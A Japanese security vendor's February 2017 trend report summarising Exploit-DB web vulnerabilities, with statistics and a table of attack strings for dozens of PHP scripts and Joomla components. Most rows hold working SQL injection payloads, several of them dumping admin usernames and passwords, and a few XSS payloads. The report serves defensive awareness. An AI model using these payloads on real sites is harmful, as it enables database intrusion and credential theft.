IoT 時代と 高度サイバー攻撃 · IoT に対するセキュリティ ... インシデント対応をはじめとする、国際連携が必要なオペレーショ ... —脆弱性への対応姿勢に対する警鐘.
2017...JoomlaはWordpressと同じく、多くの...
Transcript of 2017...JoomlaはWordpressと同じく、多くの...
2017.02
1. 脆弱性別件数脆弱性カテゴリ 件数
クロスサイトスクリプティング (Cross Site Scripting : XSS) 2
SQL インジェクション (SQL Injection) 180
合計 182
2. 危険度別件数危険度 件数 割合
高 19 10.44%
中 163 89.56%
合計 182 100.00%
3. 攻撃実行の難易度別件数難易度 件数 割合
難 19 10.44%
中 26 14.29%
易 137 75.27%
合計 182 100.00%
4. 主なソフトウェア別脆弱性発生件数ソフトウェア名 件数
Joomla 82
Itech B2B Script 5
Alstrasoft Video Share Enterprise 4
Viavi 4
Itech Movie Portal Script 4Itech Travel Portal Script 4
WordPress 3Visual Link Sharing Websites Builder Script 3
Easy Support Tools 3TI Online Examination System 3
Itech Job Portal Script 3Alstrasoft EPay Enterprise 3
ThisIsWhyImBroke Clone Script 2Quadz School Management System 2Domains & Hostings Manager PRO 2
Itech Multi Vendor Script 2Ultimate Viral Media Script 2
Zoneminder 2Automated Job Portal Script 2
Easy Web Search 2CMS Lite 1EXAMPLO 1
Itech Auction Script 1iScripts AutoHoster 1
Uploadr 1Viral Fun Facts Sharing Script 1
Takas Classified 1Property Listing Script 1PHP Marketplace Script 1
Itech Inventory Management Software 1Video Subscription 1
Itech News Portal Script 1LogoStore 1
Upworthy Clone Script 1Gram Post 1
Funny Image and Video Script 1Multilanguage Estate Agency Pro 1
Clone Script Directory Script 1Alstrasoft Forum Pay Per Post Exchange Script 1
Viral Pictures and Video Script 1Alstrasoft Template Seller Pro 1
NewsBee CMS 1HotelCMS with Booking Engine 1Web Inspiration Gallery Script 1
CodePaul ClipMass 1SlimarUSER Management 1
CLUB-8 EMS 1iScripts EasyCreate 1
QWIKIA 1Fully Featured News CMS 1
Tiger Post 1MySQL File Uploader 1
Youtube Analytics Multi Channel 1Muviko Video CMS 1
Zigaform 1Multi Outlets POS 1
Questions and Answers Script 1Mobiketa 1
Alstrasoft e-Friends 1Sendroid 1WhizBiz 1
Fome SMS Portal 1dotCMS 1
SOA School Management 1Client Expert 1
合計 182
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
サマリー
2017年2月に公開されたExploit-DBの脆弱報告件数は、1月に続き、他の期間の脆弱性数よりも4倍ほど多かったです。発見された脆弱性たちはほとんどSQLInjection関連の脆弱性でした。分析結果、攻撃の難易度は低くても攻撃の危
険度は高い攻撃が殆どでした。当該攻撃は、単純に攻撃が成功するかどうかを確認するクエリーから実際のDBデータを抽出するクエリーなど非常に様々な攻撃が行われました。脆弱性に露出されたソフトウェアを使用する管理者はSQL
Injection攻撃に露出されないよう入力値検証に対する大々的なセキュアコーディングが必要です。主要ソフトウェアに対する脆弱性発生の現況ではJoomlaCMSで最も多くの脆弱性が発見されました。 JoomlaはWordpressと同じく、多くの
ユーザが使用するCMSです。Joomlaを使用する管理者は対象プログラムおよび対象環境を必ず確認して該当プラグインに対するアップデートが必ず必要です。
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
2
180
0
20
40
60
80
100
120
140
160
180
200
クロスサイトスクリプティング
(Cross Site Scripting : XSS)
SQL インジェクション
(SQL Injection)
脆弱性別件数
19
163
険度別件数
高
中
19
26
137
攻撃実行の難易度別件数
難
中
易
82
544443
33
33
32
2
2
22
22
2
11
11
111
1 1 1
1 1
1
1
1
11
11
1
1
1
1
1
1
11
1
1
1
1
1
1
1
1
1
1
1
1
1
1 1
11
1
主なソフトウェア別脆弱性発生件数
Joomla
Itech B2B Script
Alstrasoft Video Share Enterprise
Viavi
Itech Movie Portal Script
Itech Travel Portal Script
WordPress
Visual Link Sharing Websites Builder Script
Easy Support Tools
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017-02-01 41210 SQL Injection 中 中LogoStore - search.php SQL
Injection 脆弱性
POST /LogoStore/search.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
query=test' UNION ALL SELECT
CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjj
jASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=
LogoStore LogoStore
2017-02-02 41230 SQL Injection 易 中Itech Movie Portal Script 7.37 -
cms.php SQL Injection 脆弱性/cms.php?id=1%20and%201=1--
Itech Movie
Portal Script
Itech Movie
Portal Script
7.37
2017-02-02 41230 SQL Injection 易 中
Itech Movie Portal Script 7.37 -
show_news.php SQL Injection 脆
弱性
/show_news.php?fid=1%20and%201=1--Itech Movie
Portal Script
Itech Movie
Portal Script
7.37
2017-02-02 41230 SQL Injection 易 中
Itech Movie Portal Script 7.37 -
show_misc_video.php SQL
Injection 脆弱性
/show_misc_video.php?fid=1%20and%201=1--Itech Movie
Portal Script
Itech Movie
Portal Script
7.37
2017-02-02 41231 SQL Injection 易 中
Itech Travel Portal Script 9.35 -
content.php SQL Injection 脆弱
性
/content.php?id=1%20and%201=1--Itech Travel
Portal Script
Itech Travel
Portal Script
9.35
2017-02-02 41231 SQL Injection 易 中
Itech Travel Portal Script 9.35 -
faq_show.php SQL Injection 脆
弱性
/faq_show.php?fid=1%20and%201=1--Itech Travel
Portal Script
Itech Travel
Portal Script
9.35
2017-02-02 41231 SQL Injection 易 中
Itech Travel Portal Script 9.35 -
showCity.php SQL Injection 脆弱
性
showCity.php?q=1%20and%201=1--Itech Travel
Portal Script
Itech Travel
Portal Script
9.35
2017-02-02 41231 SQL Injection 易 中Itech Travel Portal Script 9.35 -
pages.php SQL Injection 脆弱性/pages.php?id=1%20and%201=1--
Itech Travel
Portal Script
Itech Travel
Portal Script
9.35
2017-02-02 41225 SQL Injection 易 中
Property Listing Script -
property_view.php SQL Injection
脆弱性
/property_view.php?propid=443' AND SLEEP(5) AND
'FBop'='FBop
Property
Listing Script
Property
Listing Script
2017-02-02 41226 SQL Injection 易 中
Itech Inventory Management
Software 3.77 - notice-edit.php
SQL Injection 脆弱性
/notice-edit.php?aid=1%20and%201=1--
Itech
Inventory
Management
Software
Itech
Inventory
Management
Software 3.77
2017-02-02 41230 SQL Injection 易 中
Itech Movie Portal Script 7.37 -
faq_show.php SQL Injection 脆
弱性
/faq_show.php?fid=1%20and%201=1--Itech Movie
Portal Script
Itech Movie
Portal Script
7.37
2017-02-02 41228 SQL Injection 易 中
Itech News Portal Script 6.28 -
subcategory.php SQL Injection
脆弱性
/subcategory.php?sc=1%20and%201=1--Itech News
Portal Script
Itech News
Portal Script
6.28
2017-02-02 41229 SQL Injection 易 中
Itech Auction Script 6.49 -
list_photo.php SQL Injection 脆
弱性
/ajax-files/list_photo.php?pid=1%20and%201=1--Itech Auction
Script
Itech Auction
Script 6.49
2017-02-03 41239 SQL Injection 中 中Zoneminder 1.29 / 1.30 -
index.php SQL Injection 脆弱性
POST /index.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
view=request&request=log&task=query&limit=100;(SELEC
T * FROM
(SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
ZoneminderZoneminder
1.29 / 1.30
2017-02-03 41238 SQL Injection 易 中
Itech Multi Vendor Script 6.49 -
product.php SQL Injection 脆弱
性
/product.php?id=id=9 AND 9693=9693Itech Multi
Vendor Script
Itech Multi
Vendor Script
6.49
2017-02-03 41235 SQL Injection 易 中SlimarUSER Management 1.0 -
'id' Parameter SQL Injection
/userman/inbox.php?p=view&id=7' AND 6275=6275 AND
'DFYF'='DFYF
SlimarUSER
Management
SlimarUSER
Management
1.0
2017-02-03 41238 SQL Injection 易 中
Itech Multi Vendor Script 6.49 -
quickview.php SQL Injection 脆
弱性
/quickview.php?id=10%20and%209776=9776Itech Multi
Vendor Script
Itech Multi
Vendor Script
6.49
2017-02-03 41239 SQL Injection 中 中Zoneminder 1.29 / 1.30 -
index.php XSS 脆弱性
/index.php?view=request&request=log&task=download&k
ey=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%
3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2
fscript%3E%3C/body%3E%3C/html%3Eayn2h
ZoneminderZoneminder
1.29 / 1.30
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017-02-04 41252 SQL Injection 易 中
iScripts EasyCreate 3.2 -
getsitedetails.php SQL Injection
脆弱性
/getsitedetails.php?action=editsite&siteid=1%20and%201=
1--
iScripts
EasyCreate
iScripts
EasyCreate 3.2
2017-02-04 41250 SQL Injection 中 中
Itech Job Portal Script 9.13 -
news_details_us.php SQL
Injection 脆弱性
/news_details_us.php?nid=1' RLIKE (SELECT (CASE WHEN
(2796=2796) THEN 1 ELSE 0x28 END))-- WmMl
Itech Job
Portal Script
Itech Job
Portal Script
9.13
2017-02-04 41250 SQL Injection 易 中
Itech Job Portal Script 9.13 -
search_result_alluser.php XSS 脆
弱性
/search_result_alluser.php?function="><svg/onload=promp
t('CT-Zer0');>
Itech Job
Portal Script
Itech Job
Portal Script
9.13
2017-02-04 41244 SQL Injection 易 中
Alstrasoft Video Share
Enterprise 4.72 - uprofile.php
SQL Injection 脆弱性
/uprofile.php?UID=1%20and%201=1--
Alstrasoft
Video Share
Enterprise
Alstrasoft
Video Share
Enterprise
4.72
2017-02-04 41244 SQL Injection 易 中
Alstrasoft Video Share
Enterprise 4.72 - gmembers.php
SQL Injection 脆弱性
/gmembers.php?urlkey=1&gid=1%20and%201=1--
Alstrasoft
Video Share
Enterprise
Alstrasoft
Video Share
Enterprise
4.72
2017-02-04 41244 SQL Injection 易 中
Alstrasoft Video Share
Enterprise 4.72 -
channel_detail.php SQL Injection
脆弱性
/channel_detail.php?chid=1%20and%201=1--
Alstrasoft
Video Share
Enterprise
Alstrasoft
Video Share
Enterprise
4.72
2017-02-04 41241 SQL Injection 易 中
Alstrasoft EPay Enterprise 5.17 -
products.htm SQL Injection 脆弱
性
/members/products.htm?id=1%20and%201=1--
&action=update
Alstrasoft
EPay
Enterprise
Alstrasoft EPay
Enterprise
5.17
2017-02-04 41241 SQL Injection 易 中
Alstrasoft EPay Enterprise 5.17 -
subscriptions.htm SQL Injection
脆弱性
/members/subscriptions.htm?id=1%20and%201=1--
&action=update
Alstrasoft
EPay
Enterprise
Alstrasoft EPay
Enterprise
5.17
2017-02-04 41241 SQL Injection 易 中
Alstrasoft EPay Enterprise 5.17 -
userinfo.htm SQL Injection 脆弱
性
/members/userinfo.htm?id=1%20and%201=1--
Alstrasoft
EPay
Enterprise
Alstrasoft EPay
Enterprise
5.17
2017-02-04 41243 SQL Injection 易 中Alstrasoft e-Friends 5.12 -
index.php SQL Injection 脆弱性
/index.php?mode=forums&act=viewcat&seid=1%20and%2
01=1--
Alstrasoft e-
Friends
Alstrasoft e-
Friends 5.12
2017-02-04 41244 SQL Injection 易 中
Alstrasoft Video Share
Enterprise 4.72 - album.php SQL
Injection 脆弱性
/album.php?UID=1%20and%201=1--
Alstrasoft
Video Share
Enterprise
Alstrasoft
Video Share
Enterprise
4.72
2017-02-04 41247 SQL Injection 易 中
Alstrasoft Forum Pay Per Post
Exchange Script 2.01 -
index.php SQL Injection 脆弱性
/index.php?menu=forum_catview&catid=1%20and%201=1-
-
Alstrasoft
Forum Pay
Per Post
Exchange
Script
Alstrasoft
Forum Pay Per
Post Exchange
Script 2.01
2017-02-04 41249 SQL Injection 難 高
Alstrasoft Template Seller Pro
3.25e - buy.php SQL Injection
脆弱性
/buy.php?tempid=-
1+union+select+1,2,3,4,5,6,7,8+from/**/table+--+"
Alstrasoft
Template
Seller Pro
Alstrasoft
Template
Seller Pro
3.25e
2017-02-04 41250 SQL Injection 易 中
Itech Job Portal Script 9.13 -
career_advice_details.php SQL
Injection 脆弱性
/career_advice_details.php?cid=5%27%20AND%207504=75
04-- zpmu
Itech Job
Portal Script
Itech Job
Portal Script
9.13
2017-02-04 41251 SQL Injection 易 中
iScripts AutoHoster 3.0 -
getsitedetails.php SQL Injection
脆弱性
/websitebuilder/getsitedetails.php?action=editsite&siteid=1
%20and%201=1--
iScripts
AutoHoster
iScripts
AutoHoster
3.0
2017-02-06 41264 SQL Injection 難 高
Questions and Answers Script
2.0.0 - category.php SQL
Injection 脆弱性
/category.php?cid=-
9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,
0x3a,adminpassword),3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,a
dminuser,0x3a,adminpassword),14,15,16,17,18,19,20,21,23+
from+admin-- -
Questions and
Answers
Script
Questions and
Answers Script
2.0.0
2017-02-06 41263 SQL Injection 易 中
Viral Fun Facts Sharing Script
1.1.0 - fact.php SQL Injection 脆
弱性
/fact.php?id=1%20and%201=1--
Viral Fun
Facts Sharing
Script
Viral Fun Facts
Sharing Script
1.1.0
2017-02-06 41256 SQL Injection 中 中
Visual Link Sharing Websites
Builder Script 2.1.0 - cat.php
SQL Injection 脆弱性 #
/cat.php?id=-
9999+/*!50000union*/+select+1,2,3,4,concat_ws(0x3a,admi
nuser,0x3a,adminpassword),6,7,8,9,10,11,12,13,14,15+from+
admin--
Visual Link
Sharing
Websites
Builder Script
Visual Link
Sharing
Websites
Builder Script
2.1.0
2017-02-06 41256 SQL Injection 中 中
Visual Link Sharing Websites
Builder Script 2.1.0 -
user_posts.php SQL Injection 脆
弱性
/user_posts.php?id=-
9999+/*!50000union*/+select+1,2,3,4,concat_ws(0x3a,admi
nuser,0x3a,adminpassword),6,7,8,9,10,11,12,13,14,15+from+
admin--
Visual Link
Sharing
Websites
Builder Script
Visual Link
Sharing
Websites
Builder Script
2.1.0
2017-02-06 41255 SQL Injection 難 高
Ultimate Viral Media Script 1.0 -
picture.php SQL Injection 脆弱性
#
/picture.php?id=9999+/*!50000union*/+select+1,concat_ws
(0x3a,adminuser,0x3a,adminpassword,0x3c62723e49485341
4e2053454e43414e3c62723e7777772e696873616e2e6e657
4),3,4,5,6,7,0x564552204159415249203a29,9,10,11,12,13,14,
15,16+from+admin--
Ultimate Viral
Media Script
Ultimate Viral
Media Script
1.0
2017-02-06 41253 SQL Injection 難 高
ThisIsWhyImBroke Clone Script
4.0 - listing.php SQL Injection 脆
弱性
/listing.php?id=-
21+/*!50000union*/+select+1,version(),3,(Select+export_set
(5,@:=0,(select+count(*)from(information_schema.columns)
where@:=export_set(5,export_set(5,@,table_name,0x3c6c69
3e,2),column_name,0xa3a,2)),@,2)),5,6,7,8,9,10,11,12,14,15,1
6,17
ThisIsWhyImB
roke Clone
Script
ThisIsWhyImBr
oke Clone
Script 4.0
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017-02-06 41254 SQL Injection 中 中Upworthy Clone Script 1.1.0 -
post.php SQL Injection 脆弱性
/post.php?id=-
267+/*!50000union*/+select+(Select+export_set(5,@:=0,(se
lect+count(*)from(information_schema.columns)where@:=e
xport_set(5,export_set(5,@,table_name,0x3c6c693e,2),colum
n_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
Upworthy
Clone Script
Upworthy
Clone Script
1.1.0
2017-02-06 41255 SQL Injection 難 高Ultimate Viral Media Script 1.0 -
video.php SQL Injection 脆弱性
/video.php?id=9999+/*!50000union*/+select+1,concat_ws(
0x3a,adminuser,0x3a,adminpassword,0x3c62723e49485341
4e2053454e43414e3c62723e7777772e696873616e2e6e657
4),3,4,5,6,7,0x564552204159415249203a29,9,10,11,12,13,14,
15,16+from+admin--
Ultimate Viral
Media Script
Ultimate Viral
Media Script
1.0
2017-02-06 41256 SQL Injection 中 中
Visual Link Sharing Websites
Builder Script 2.1.0 - profile.php
SQL Injection 脆弱性
/profile.php?id=-
9999+/*!50000union*/+select+1,2,3,4,concat_ws(0x3a,admi
nuser,0x3a,adminpassword),6,7,8,9,10,11,12,13,14,15+from+
admin--
Visual Link
Sharing
Websites
Builder Script
Visual Link
Sharing
Websites
Builder Script
2.1.0
2017-02-06 41257 SQL Injection 難 高
ThisIsWhyImBroke Clone Script
4.0.0 - listing.php SQL Injection
脆弱性
/listing.php?id=-
21+/*!50000union*/+select+1,version(),3,(Select+export_set
(5,@:=0,(select+count(*)from(information_schema.columns)
where@:=export_set(5,export_set(5,@,table_name,0x3c6c69
3e,2),column_name,0xa3a,2)),@,2)),5,6,7,8,9,10,11,12,14,15,1
6,17
ThisIsWhyImB
roke Clone
Script
ThisIsWhyImBr
oke Clone
Script 4.0.0
2017-02-06 41258 SQL Injection 中 中
Funny Image and Video Script
2.0.0 - post.php SQL Injection
脆弱性
/post.php?id=-
9999+/*!50000union*/+select+concat_ws(0x3a,adminuser,0
x3a,adminpassword),2,3,4,5,6,7,8,9,10,11+from+admin--
Funny Image
and Video
Script
Funny Image
and Video
Script 2.0.0
2017-02-06 41259 SQL Injection 難 高
Clone Script Directory Script
1.1.0 - cat.php SQL Injection 脆
弱性
/cat.php?cid=-
9999'+/*!50000union*/+select+1,concat_ws(0x3a,adminuser
,0x3a,adminpassword),3,4,0x494853414e2053454e43414e3c
62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12,13,1
4,15,16,17,18,19,20,21+from+admin-- -
Clone Script
Directory
Script
Clone Script
Directory
Script 1.1.0
2017-02-06 41260 SQL Injection 難 高
Viral Pictures and Video Script
2.0.0 - picture.php SQL Injection
脆弱性
/picture.php?id=7-
9999+/*!50000union*/+select+1,2,concat_ws(0x3a,adminus
er,0x3a,adminpassword),4,5,6,7,8+from+admin-- -
Viral Pictures
and Video
Script
Viral Pictures
and Video
Script 2.0.0
2017-02-06 41261 SQL Injection 難 高NewsBee CMS - /newsbee/ SQL
Injection 脆弱性
/newsbee/30' AND (SELECT 4020 FROM(SELECT
COUNT(*),CONCAT(0x717a767a71,(SELECT
(ELT(4020=4020,1))),0x7170707171,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
AND
'Tdxc'='Tdxc_news_thai_soccer_targets_asia_wide_goals.html
NewsBee CMS NewsBee CMS
2017-02-06 41262 SQL Injection 中 中
Web Inspiration Gallery Script
1.0.0 - site.php SQL Injection 脆
弱性
/site.php?id=-
9999+/*!50000union*/+select+concat_ws(0x3a,username,0x
3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
21,22,23,24+from+administrator--
Web
Inspiration
Gallery Script
Web
Inspiration
Gallery Script
1.0.0
2017-02-07 41269 SQL Injection 中 中Easy Web Search 3 - all.php
SQL Injection 脆弱性
/all.php?q=&stt=99999'+Procedure+Analyse+(extractvalue(
0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@vers
ion)),0)-- -
Easy Web
Search
Easy Web
Search 3
2017-02-07 41268 SQL Injection 中 中
Easy Support Tools 1.0 -
support.php SQL Injection 脆弱
性
/support.php?stt=1+Procedure+Analyse+(extractvalue(0,co
ncat(0x27,0x496873616e2053656e63616e,0x3a,@@version)
),0)-- -
Easy Support
Tools
Easy Support
Tools 1.0
2017-02-07 41268 SQL Injection 中 中Easy Support Tools 1.0 -
blog.php SQL Injection 脆弱性
/blog.php?stt=1+Procedure+Analyse+(extractvalue(0,conca
t(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)
-- -
Easy Support
Tools
Easy Support
Tools 1.0
2017-02-07 41266 SQL Injection 中 中Fully Featured News CMS 1.0 -
video.php SQL Injection 脆弱性
/video.php?id=-
9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,
0x3c62723e,pw),3,4,5,6,7+from+admin-- -
Fully Featured
News CMS
Fully Featured
News CMS 1.0
2017-02-07 41267 SQL Injection 中 中
MySQL File Uploader 1.0 -
download.php SQL Injection 脆
弱性
/download.php?id=-
9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,
0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
MySQL File
Uploader
MySQL File
Uploader 1.0
2017-02-07 41268 SQL Injection 中 中Easy Support Tools 1.0 -
faq.php SQL Injection 脆弱性
/faq.php?stt=1+Procedure+Analyse+(extractvalue(0,concat(
0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--
-
Easy Support
Tools
Easy Support
Tools 1.0
2017-02-07 41269 SQL Injection 中 中Easy Web Search 3 - go.php
SQL Injection 脆弱性
/go.php?id=99999'+Procedure+Analyse+(extractvalue(0,co
ncat(0x27,0x496873616e2053656e63616e,0x3a,@@version)
),0)-- -
Easy Web
Search
Easy Web
Search 3
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017-02-08 41279 SQL Injection 中 中Muviko Video CMS - search.php
SQL Injection 脆弱性
/search.php?q=-
9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,em
ail,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,
11,12,13,14,15+from+users-- -
Muviko Video
CMS
Muviko Video
CMS
2017-02-08 41280 SQL Injection 易 中Multi Outlets POS 3.1 - / SQL
Injection 脆弱性/view_invoice?id=1%20and%201=1--
Multi Outlets
POS
Multi Outlets
POS 3.1
2017-02-09 41283 SQL Injection 易 中Mobiketa 3.5 - index.php SQL
Injection 脆弱性/index.php?url=myCampaign&view=1%20and%201=1-- Mobiketa Mobiketa 3.5
2017-02-09 41284 SQL Injection 易 中 Sendroid 5.2 - SQL Injection /Compose.php?msgID=1%20and%201=1-- Sendroid Sendroid 5.2
2017-02-09 41285 SQL Injection 易 中
Fome SMS Portal 2.0 -
Compose.php SQL Injection 脆
弱性
/Compose.php?draftID=1%20and%201=1--Fome SMS
Portal
Fome SMS
Portal 2.0
2017-02-09 41286 SQL Injection 易 中
SOA School Management -
Document.php SQL Injection 脆
弱性
/Document.php?view=1%20and%201=1--SOA School
Management
SOA School
Management
2017-02-09 41287 SQL Injection 易 中Client Expert 1.0.1 - index.php
SQL Injection 脆弱性/index.php?view=ViewInvoice&id=1%20and%201=1-- Client Expert
Client Expert
1.0.1
2017-02-09 41288 SQL Injection 易 中EXAMPLO - index.php SQL
Injection 脆弱性
/index.php?page=exams&action=edit&eid=1%20and%201
=1--EXAMPLO EXAMPLO
2017-02-10 41307 SQL Injection 易 中HotelCMS with Booking Engine
- / SQL Injection 脆弱性/locale?locale=1%20and%201=1--
HotelCMS
with Booking
Engine
HotelCMS
with Booking
Engine
2017-02-10 41306 SQL Injection 易 中Video Subscription - / SQL
Injection 脆弱性/search?keyword=1%20and%201=1--
Video
Subscription
Video
Subscription
2017-02-10 41305 SQL Injection 易 中CodePaul ClipMass - / SQL
Injection 脆弱性/search?keyword=1%20and%201=1--
CodePaul
ClipMass
CodePaul
ClipMass
2017-02-10 41304 SQL Injection 易 中 Uploadr - / SQL Injection 脆弱性 /search?keyword=1%20and%201=1-- Uploadr Uploadr
2017-02-10 41303 SQL Injection 難 高CLUB-8 EMS - editwatch.php
SQL Injection 脆弱性
/editwatch.php?id=-
999'+/*!50000union*/+select+group_concat(username,char
(58),password),0x496873616e2053656e63616e,0x7777772e
696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+user
s-- -
CLUB-8 EMS CLUB-8 EMS
2017-02-10 41302 SQL Injection 難 高
Automated Job Portal Script -
jobdetail.php SQL Injection 脆弱
性
/jobdetail.php?id=999'+union+all+select+1,2,3,4,concat_ws(
0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,
0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e636
16e202d207777772e696873616e2e6e6574,13,14,15,16,17,1
8,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
Automated
Job Portal
Script
Automated
Job Portal
Script
2017-02-10 41302 SQL Injection 難 高Automated Job Portal Script -
search.php SQL Injection 脆弱性
/search.php?keyword=1&location=999'+union+all+select+
1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c
62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873
616e2053656e63616e202d207777772e696873616e2e6e65
74,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28
+from+admin-- -
Automated
Job Portal
Script
Automated
Job Portal
Script
2017-02-10 41301 SQL Injection 易 中QWIKIA 1.1.1 / SQL Injection 脆
弱性/search?q=1%20and%201=1-- QWIKIA QWIKIA 1.1.1
2017-02-10 41290 SQL Injection 易 中CMS Lite 1.3.1 - / SQL Injection
脆弱性/?Style=1%20and%201=1-- CMS Lite CMS Lite 1.3.1
2017-02-10 41291 SQL Injection 中 中
Tiger Post 3.0.1 -
/index.php/user_management/
SQL Injection 脆弱性
/index.php/user_management/update?id=999'+/*!50000uni
on*/+select+1,2,3,4,group_concat(email,char(58),password),
0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_
management-- -
Tiger PostTiger Post
3.0.1
2017-02-10 41292 SQL Injection 易 中 Gram Post 1.0 - SQL Injection
/index.php/instagram_accounts/update?id=9999'+/*!50000
union*/+select+group_concat(email,char(58),password),2,3,
4,5,6+from+user_management-- -Gram Post Gram Post 1.0
2017-02-10 41293 SQL Injection 易 中Youtube Analytics Multi Channel
3.0 - SQL Injection
/index.php/user_management/update?id=1%20and%201=1
--
Youtube
Analytics
Multi Channel
Youtube
Analytics Multi
Channel 3.0
2017-02-10 41295 SQL Injection 易 中Takas Classified 1.1 - SQL
Injection 脆弱性
/index.php/classified_ads/ads/?&subcatid=1%20and%201=
1--
Takas
Classified
Takas
Classified 1.1
2017-02-10 41296 SQL Injection 易 中
Zigaform -
/formbuilder/frontend/viewform
/ SQL Injection 脆弱性
/formbuilder/frontend/viewform/?form=1%20and%201=1-- Zigaform Zigaform
2017-02-10 41300 SQL Injection 易 中
Multilanguage Estate Agency
Pro 1.2 - property_show.php
SQL Injection 脆弱性
/property_show.php?id=1%20and%201=1--
Multilanguage
Estate Agency
Pro
Multilanguage
Estate Agency
Pro 1.2
2017-02-11 41327 SQL Injection 易 中
Joomla! Component Soccer Bet
4.1.5 - index.php SQL Injection
脆弱性
/index.php?option=com_soccerbet&view=matches&cat=1
%20and%201=1--Joomla
Joomla!
Component
Soccer Bet
4.1.5
2017-02-11 41326 SQL Injection 易 中
Joomla! Component Vik
Booking 1.7 - index.php SQL
Injection 脆弱性
/index.php?option=com_vikbooking&view=availability&roo
m_ids[0]=1%20and%201=1--Joomla
Joomla!
Component
Vik Booking
1.7
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017-02-11 41325 SQL Injection 易 中
Joomla! Component Sponsor
Wall 7.0 - index.php SQL
Injection 脆弱性
/index.php?option=com_sponsorwall&task=click&wallid=1
%20and%201=1--Joomla
Joomla!
Component
Sponsor Wall
7.0
2017-02-11 41324 SQL Injection 易 中
Joomla! Component onisMusic
2 - index.php SQL Injection 脆弱
性
/index.php?option=com_onismusic&view=songs&tag=1%2
0and%201=1--Joomla
Joomla!
Component
onisMusic 2
2017-02-11 41323 SQL Injection 易 中
Joomla! Component onisQuotes
2.5 - index.php SQL Injection 脆
弱性
/index.php?option=com_onisquotes&view=quotes&tag=1
%20and%201=1--&Itemid=180Joomla
Joomla!
Component
onisQuotes
2.5
2017-02-11 41322 SQL Injection 易 中
Joomla! Component
onisPetitions 2.5 - index.php
SQL Injection 脆弱性
/index.php?option=com_onispetitions&view=petitions&tag
=1%20and%201=1--Joomla
Joomla!
Component
onisPetitions
2.5
2017-02-12 41359 SQL Injection 中 中
Itech B2B Script 4.29 -
/search.php SQL Injection 脆弱
性
/search.php?keywords=') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e
58566e66484f74555968674d504262564348434b70657a4c4
5556b534e,0x716a626271)#
Itech B2B
Script
Itech B2B
Script 4.29
2017-02-12 41359 SQL Injection 中 中
Itech B2B Script 4.29 -
/catcompany.php SQL Injection
脆弱性
/catcompany.php?token=') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e
58566e66484f74555968674d504262564348434b70657a4c4
5556b534e,0x716a626271)#
Itech B2B
Script
Itech B2B
Script 4.29
2017-02-12 41359 SQL Injection 中 中
Itech B2B Script 4.29 -
/buyleads-details.php SQL
